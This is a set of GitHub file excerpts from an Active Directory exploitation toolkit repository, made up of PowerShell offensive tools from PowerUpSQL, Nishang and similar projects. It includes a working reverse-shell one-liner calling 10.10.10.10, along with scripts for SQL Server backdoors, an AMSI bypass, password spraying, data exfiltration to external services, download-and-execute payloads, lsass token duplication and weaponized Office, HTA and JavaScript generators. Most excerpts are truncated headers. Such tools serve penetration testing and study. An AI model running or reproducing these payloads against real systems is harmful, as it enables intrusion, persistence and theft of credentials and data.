github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/scripts/pending/Invoke-SqlServer-Persist-TriggerLogon.psm1 | PowerShell | mit | 2,733 | master | 17,597 | function Invoke-SqlServer-Persist-TriggerLogon
{
<#
.SYNOPSIS
This script can be used backdoor a Windows system using SQL Serverlogon triggers.
.DESCRIPTION
This script can be used backdoor a Windows system using a SQL Server logon triggers.
As a result, the associated TSQL will execute when any the attack at... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/scripts/pending/Invoke-SQLOSCmdCLRWMIProvider.ps1 | PowerShell | mit | 2,733 | master | 29,987 | # todo
<#
Note: dependant on PowerUpSQL.
- have script accept command or source script as string
--- have that get bake into the wmi provider method
--- update the wmi method to execute the provided string as a script block
--- mod the clr to return the output of the wmi command
- roll into clone of the inv... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/scripts/pending/Get-MSSQLCredentialPasswords.psm1 | PowerShell | mit | 2,733 | master | 5,843 | function Get-MSSQLCredentialPasswords{
<#
.SYNOPSIS
Extract and decrypt MSSQL Credentials passwords.
Author: Antti Rantasaari 2014, NetSPI
License: BSD 3-Clause
.DESCRIPTION
Get-MSSQLCredentialPasswords extracts and decrypts the connection credentials for all saved Credentials.
.INPUTS... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/scripts/pending/SQLC2.ps1 | PowerShell | mit | 2,733 | master | 109,752 | <#
Script: SQLC2.ps1
Description: This is a basic PoC script that contains functions that can be
used to install and manage a C2 via a SQL Server instance.
The C2 SQL Server is intended to be hosted remotely or in Azure
via a database.windows.net address. The client functions can be
ru... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/PowerUpSQL/scripts/pending/Invoke-SqlServer-Persist-StartupSp.psm1 | PowerShell | mit | 2,733 | master | 17,811 | function Invoke-SqlServer-Persist-StartupSp
{
<#
.SYNOPSIS
This script can be used backdoor a Windows system using a SQL Server startup stored procedure.
This is done marking a user defined stored procedure to run when the SQL Server is restarted
using the native sp_procoption stored procedure. Note: This scri... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Invoke-PowerShellTcpOneLine/Invoke-PowerShellTcpOneLine.ps1 | PowerShell | mit | 2,733 | master | 531 | # Nikhil SamratAshok Mittal
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $dat... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Invoke-SDPropagator/Invoke-SDPropagator.ps1 | PowerShell | mit | 2,733 | master | 2,776 |
function Invoke-SDPropagator
<#
.Description
Invoke the SDPropagator on the current domain (users domain)
.Parameter ShowProgress
Display progress and wait for sdpropagation to complete use -showprogress:$false to not wait for propagation to complete.
.Parameter TimeoutMinutes
The number of minutes to wait for S... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Invoke-DomainPasswordSpray/DomainPasswordSpray.ps1 | PowerShell | mit | 2,733 | master | 19,105 | function Invoke-DomainPasswordSpray{
<#
.SYNOPSIS
This module performs a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. Be careful not to lockout any accounts.
DomainPasswordSpray Function: Invoke-DomainPasswordSpray
Author:... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/AmsiScanBufferBypass/ASBBypass.ps1 | PowerShell | mit | 2,733 | master | 785 | $Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
pub... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Set-AD-ACL/Set-ADACL.ps1 | PowerShell | mit | 2,733 | master | 2,643 | #requires -Modules ActiveDirectory
function Set-ADACL
{
[CmdletBinding()] Param(
[Parameter(Position = 1, Mandatory = $False)]
[String]
$SAMAccountName,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$DistinguishedName,
[Parameter(Positio... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Deploy-Deception-master/Deploy-Deception.psm1 | PowerShell | mit | 2,733 | master | 360 |
<#
Import this module to load all the functions in Deploy-Deception in the current PowerShell session.
PS > Import-Module C:\Deploy-Deception\Deploy-Deception.psm1
#>
if(!$PSScriptRoot)
{
$PSScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
}
$PSScriptRoot
Get-ChildItem -Recurse $PSScriptRoot *.ps... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Deploy-Deception-master/Deploy-Deception.ps1 | PowerShell | mit | 2,733 | master | 44,741 | #Requires –Modules ActiveDirectory
<#
File: Deploy-Deception.ps1
Author: Nikhil Mittal (@nikhil_mitt)
Description: A PowerShell module to deploy active directory decoy objects.
Required Dependencies: ActiveDirectory Module by Microsoft
#>
##################################### Helper Functions ####################... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/nishang.psm1 | PowerShell | mit | 2,733 | master | 929 | <#
Import this module to use all the scripts in Nishang, except Keylogger, in the current PowerShell session. The module must reside in the Nishang folder.
PS > Import-Module .\nishang.psm1
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
https://github.com/samratashok/nishang
#>
if(!$PSScriptRoot)... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Add-Persistence.ps1 | PowerShell | mit | 2,733 | master | 6,846 | function Add-Persistence
{
<#
.SYNOPSIS
Nishang script which could be used to make execution of a PowerShell script from disk or URL reboot persistent using WMI permannet event consumer.
.DESCRIPTION
This script accepts path of a script or URL which is then executed on every reboot persistently.
In case the PayloadScr... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Do-Exfiltration.ps1 | PowerShell | mit | 2,733 | master | 6,113 | function Do-Exfiltration
{
<#
.SYNOPSIS
Use this script to exfiltrate data from a target.
.DESCRIPTION
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and D... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/TexttoExe.ps1 | PowerShell | mit | 2,733 | master | 931 | function TexttoEXE
{
<#
.SYNOPSIS
Nishang script to convert a PE file in hex format to executable
.DESCRIPTION
This script converts a PE file in hex to executable and writes it to user temp.
.PARAMETER Filename
Path of the hex text file from which executable will be created.
.PARAMETER EXE
Path where the executable... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Add-Exfiltration.ps1 | PowerShell | mit | 2,733 | master | 7,512 | function Add-Exfiltration
{
<#
.SYNOPSIS
Use this script to exfiltrate data from a target.
.DESCRIPTION
This script can be used to exfiltrate data from a target to Gmail, Pastebin, a web server which can log POST requests,
or a DNS server which can log TXT queries. To decode the data exfiltrated by the web server and ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/ExetoText.ps1 | PowerShell | mit | 2,733 | master | 926 | function ExetoText
{
<#
.SYNOPSIS
Nishang script to convert an executable to text file.
.DESCRIPTION
This script converts and an executable to a text file.
.PARAMETER EXE
The path of the executable to be converted.
.PARAMETER FileName
Path of the text file to which executable will be converted.
.EXAMPLE
PS > ExetoT... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Download.ps1 | PowerShell | mit | 2,733 | master | 806 | function Download
{
<#
.SYNOPSIS
Nishang Payload to download a file in current users temp directory.
.DESCRIPTION
This payload downloads a file to the given location.
.PARAMETER URL
The URL from where the file would be downloaded.
.PARAMETER FileName
Name of the file where download would be saved.
.EXAMPLE
PS > Dow... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Parse_Keys.ps1 | PowerShell | mit | 2,733 | master | 6,925 | function Parse_Keys
{
<#
.SYNOPSIS
A script which could be used to parse keys logged
by Kelogger payload of Nishang.
.DESCRIPTION
This script parses keys logged by Keylogger payload
of Nishang.
.PARAMETER RawKeys
Name of the text file which contains logged keys.
.PARAMETER LoggedKeys
Name of the text file where par... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Invoke-Encode.ps1 | PowerShell | mit | 2,733 | master | 4,722 | function Invoke-Encode
{
<#
.SYNOPSIS
Script for Nishang to encode and compress plain data.
.DESCRIPTION
The script asks for a path to a plain file or string, encodes it and writes to a file "encoded.txt" in the current working directory.
If the switch -OutCommand is used. An encoded command which could be executed o... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/StringToBase64.ps1 | PowerShell | mit | 2,733 | master | 1,327 | function StringtoBase64
{
<#
.SYNOPSIS
Nishang script which encodes a string to base64 string.
.DESCRIPTION
This payload encodes the given string to base64 string and writes it to base64encoded.txt in current directory.
.PARAMETER Str
The string to be encoded
.PARAMETER OutputFile
The path of the output file. Defau... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Start-CaptureServer.ps1 | PowerShell | mit | 2,733 | master | 6,351 | function Start-CaptureServer
{
<#
.SYNOPSIS
Nishang script which could be used to capture user crednetials in plain or SMB hashes.
.DESCRIPTION
The script starts a listener on specified IP and port. When using Basic Authtype, any user connecting to the server
will be presented with a credentials prompt, if a user ente... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Remove-Persistence.ps1 | PowerShell | mit | 2,733 | master | 3,014 | function Remove-Persistence
{
<#
.SYNOPSIS
Nishang script which could be used to clear the persistence added by Nishang payloads and scripts.
.DESCRIPTION
This script cleans WMI events and Registry keys added by various payloads and Add-persistence script.
Run the script as an Administrator to remove the WMI events.
... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Invoke-Decode.ps1 | PowerShell | mit | 2,733 | master | 1,894 | function Invoke-Decode
{
<#
.SYNOPSIS
Script for Nishang to decode the data encoded by Invoke-Encode, DNS TXT and POST exfiltration methods.
.DESCRIPTION
The script asks for an encoded string as an option, decodes it and writes to a file "decoded.txt" in the current working directory.
Both the encoding and decoding is... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Out-DnsTxt.ps1 | PowerShell | mit | 2,733 | master | 4,001 | function Out-DnsTxt
{
<#
.SYNOPSIS
Script for Nishang to generate DNS TXT records which could be used with other scripts.
.DESCRIPTION
Use this script to generate DNS TXT records to be used with DNS_TXT_Pwnage and Execute-DNSTXT-Code.
The script asks for a path to a plain file or string, compresses and encodes it and... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/ConvertTo-ROT13.ps1 | PowerShell | mit | 2,733 | master | 1,318 | function ConvertTo-ROT13
{
<#
.SYNOPSIS
Nishang script which can encode a string to ROT13 or decode a ROT13 string.
.DESCRIPTION
Nishang script which can encode a string to ROT13 or decode a ROT13 string.
.PARAMETER rot13string
The string which needs to be encoded or decode.
.EXAMPLE
PS > ConvertTo-ROT13 -rot13stri... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Utility/Base64ToString.ps1 | PowerShell | mit | 2,733 | master | 1,343 | function Base64ToString
{
<#
.SYNOPSIS
Nishang script which decodes a base64 string to readable.
.DESCRIPTION
This payload decodes a base64 string to readable.
.PARAMETER Base64Strfile
The filename which contains base64 string to be decoded. Default is "decoded.txt" in the current working directory.
Use the parameter... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-WebQuery.ps1 | PowerShell | mit | 2,733 | master | 3,183 | function Out-WebQuery
{
<#
.SYNOPSIS
Nishang script which creates a Web Query (.iqy) file which can be used for phishing attacks.
.DESCRIPTION
The script generates a Web Query (.iqy). When a target opens the file, it is opened inside an Excel Sheet and the
user is presented with a warning for enabling data connection.... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-SCT.ps1 | PowerShell | mit | 2,733 | master | 3,517 | function Out-SCT
{
<#
.SYNOPSIS
Nishang script useful for creating "weaponized" SCT files which could be used to run PowerShell commands and scripts.
.DESCRIPTION
The script generates a SCT file with an XML extension. The file (default name UpdateCheck.xml) needs to be
hosted on a web server and using regsvr32 built-... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-SCF.ps1 | PowerShell | mit | 2,733 | master | 1,692 | function Out-SCF
{
<#
.SYNOPSIS
Nishang script useful for creating SCF files which could be used to capture NTLM hashes.
.DESCRIPTION
The script generates a SCF file. The file (default name "SystemCatalog.scf") needs to be
put on a share. Whenever a user opens the file on the share, his credentials are sent to the sp... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-Shortcut.ps1 | PowerShell | mit | 2,733 | master | 4,336 | function Out-Shortcut
{
<#
.SYNOPSIS
Nishang script which creates a shortcut capable of launching PowerShell commands and scripts.
.DESCRIPTION
The script generates a shortcut (.lnk). When a target opens the shortcut, the predefined powershell scripts and/or commands get executed.
A hotkey for the shortcut could also ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-Excel.ps1 | PowerShell | mit | 2,733 | master | 19,112 | function Out-Excel
{
<#
.SYNOPSIS
Nishang Script which can generate and "infect" existing excel files with an auto executable macro or DDE.
.DESCRIPTION
The script can create as well as "infect" existing excel files with an auto executable macro or DDE. Powershell or other payloads
could be exeucted using the genere... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-Word.ps1 | PowerShell | mit | 2,733 | master | 17,660 | function Out-Word
{
<#
.SYNOPSIS
Nishang Script which can generate as well as "infect" existing word files with an auto executable macro or DDE.
.DESCRIPTION
The script can create as well as "infect" existing word files with an auto executable macro or DDE. Powershell or other payloads
could be exeucted using the gen... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-HTA.ps1 | PowerShell | mit | 2,733 | master | 5,265 | function Out-HTA
{
<#
.SYNOPSIS
Nishang script which could be used for generating "infected" HTML Application. It could be deployed on
a web server and PowerShell scripts and commands could be executed on the target machine.
.DESCRIPTION
The script generates a HTA file with inline VBScript. The HTA should be deployed... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-JS.ps1 | PowerShell | mit | 2,733 | master | 2,910 | function Out-JS
{
<#
.SYNOPSIS
Nishang script useful for creating "weaponized" JavaScript file which could be used to run PowerShell commands and scripts.
.DESCRIPTION
The script generates a JavaScript file. The JavaScript file (default name Style.js) needs to be sent to a target.
As soon as a target user opens the J... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-Java.ps1 | PowerShell | mit | 2,733 | master | 7,077 | function Out-Java
{
<#
.SYNOPSIS
Nishang script which could be used for generating JAR to be used for applets.
.DESCRIPTION
The script generates a Signed JAR and one line HTML code. These could be deployed on a web server. When a target opens
up the URL hosting these, the predefined PowerShell commands and scripts co... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Client/Out-CHM.ps1 | PowerShell | mit | 2,733 | master | 19,502 | function Out-CHM
{
<#
.SYNOPSIS
Nishang script useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts.
.DESCRIPTION
The script generates a CHM file which needs to be sent to a target.
You must have hhc.exe (HTML Help Workshop) on your machine to use this script.
... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Execution/Execute-Command-MSSQL.ps1 | PowerShell | mit | 2,733 | master | 6,473 | function Execute-Command-MSSQL {
<#
.SYNOPSIS
Nishang payload which could be used to execute commands remotely on a MS SQL server.
.DESCRIPTION
This payload needs a valid administrator username and password on remote SQL server.
It uses the credentials to enable xp_cmdshell and provides a powershell shell, a sql shell... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Execution/Out-RundllCommand.ps1 | PowerShell | mit | 2,733 | master | 3,956 | function Out-RundllCommand
{
<#
.SYNOPSIS
Nishang script that can be used for generating rundll32.exe one line commands to run PowerShell commands and scripts or a
reverse PowerShell session. Also useful for bypassing AppLocker.
.DESCRIPTION
This script generates rundll32 commands which can be used to to run PowerShe... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Execution/Download-Execute-PS.ps1 | PowerShell | mit | 2,733 | master | 1,933 | function Download-Execute-PS
{
<#
.SYNOPSIS
Nishang Payload which downloads and executes a powershell script.
.DESCRIPTION
This payload downloads a powershell script from specified URL and then executes it on the target.
Use the -nowdownload option to avoid saving the script on the target. Otherwise, the script is sav... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Execution/Execute-DNSTXT-Code.ps1 | PowerShell | mit | 2,733 | master | 4,609 | function Execute-DNSTXT-Code
{
<#
.SYNOPSIS
Payload which could execute shellcode from DNS TXT queries.
.DESCRIPTION
This payload is able to pull shellcode from txt record of a domain.
Below commands could be used to generate shellcode to be usable with this script
./msfvenom -p windows/meterpreter/reverse_https -f p... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Execution/Download_Execute.ps1 | PowerShell | mit | 2,733 | master | 1,887 | function Download_Execute
{
<#
.SYNOPSIS
Nishang Payload to download an executable in text format, convert it to executable and execute.
.DESCRIPTION
This payload downloads an executable in text format, converts it to executable and execute.
Use exetotext.ps1 script to change an executable to text
.PARAMETER URL
The ... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Escalation/Enable-DuplicateToken.ps1 | PowerShell | mit | 2,733 | master | 5,345 | function Enable-DuplicateToken
{
<#
.SYNOPSIS
Nishang payload which duplicates the Access token of lsass and sets it in the current process thread.
.DESCRIPTION
This payload duplicates the Access token of lsass and sets it in the current process thread.
The payload must be run with elevated permissions.
.EXAM... |
github | Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet | Z - Tool Box/Nishang/Escalation/Remove-Update.ps1 | PowerShell | mit | 2,733 | master | 2,229 | function Remove-Update {
<#
.SYNOPSIS
Nishang Payload which silently removes updates for a target machine.
.DESCRIPTION
This payload removes updates from a target machine. This could be
used to remove all updates, all security updates or a particular update.
.PARAMETER KBID
THE KBID of update you want to remove. All... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.